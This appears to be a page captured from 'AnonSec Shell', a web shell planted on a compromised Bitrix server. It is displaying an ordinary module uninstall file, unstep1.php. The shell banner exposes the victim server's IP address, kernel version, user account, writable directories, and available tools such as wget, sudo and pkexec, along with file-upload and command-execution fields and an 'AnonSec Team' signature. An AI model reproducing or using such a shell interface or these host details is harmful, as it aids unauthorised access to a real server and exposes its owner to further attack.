AnonSec Shell
Server IP : 85.193.89.191  /  Your IP : 3.149.240.129
Web Server : Apache
System : Linux 956367-cx40159.tmweb.ru 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
User : bitrix ( 600)
PHP Version : 8.1.27
Disable Function : NONE
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/bitrix/www/bitrix/modules/iblock/install/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/bitrix/www/bitrix/modules/iblock/install//unstep1.php
<?php

IncludeModuleLangFile(__FILE__);

foreach(GetModuleEvents('iblock', 'OnModuleUnInstall', true) as $arEvent)
	ExecuteModuleEventEx($arEvent);

?>

<? if ($ex = $APPLICATION->GetException()) { ?>
	<form action="<?=$APPLICATION->GetCurPage(); ?>">
		<? $message = new CAdminMessage(GetMessage('MOD_UNINST_IMPOSSIBLE'), $ex); ?>
		<?=$message->show(); ?>
		<input type="hidden" name="lang" value="<?=LANG; ?>">
		<input type="submit" name="inst" value="<?=GetMessage('MOD_UNINST_BACK'); ?>">
	<form>
<? } else { ?>
	<form action="<?=$APPLICATION->GetCurPage(); ?>">
		<?=bitrix_sessid_post(); ?>
		<input type="hidden" name="lang" value="<?=LANG; ?>">
		<input type="hidden" name="id" value="iblock">
		<input type="hidden" name="uninstall" value="Y">
		<input type="hidden" name="step" value="2">
		<?=CAdminMessage::ShowMessage(GetMessage('MOD_UNINST_WARN')); ?>
		<p><?=GetMessage('MOD_UNINST_SAVE'); ?></p>
		<p><input type="checkbox" name="savedata" id="savedata" value="Y" checked><label for="savedata"><?=GetMessage('MOD_UNINST_SAVE_TABLES'); ?></label></p>
		<input type="submit" name="inst" value="<?=GetMessage('MOD_UNINST_DEL'); ?>">
	</form>
<? } ?>

Anon7 - 2022
AnonSec Team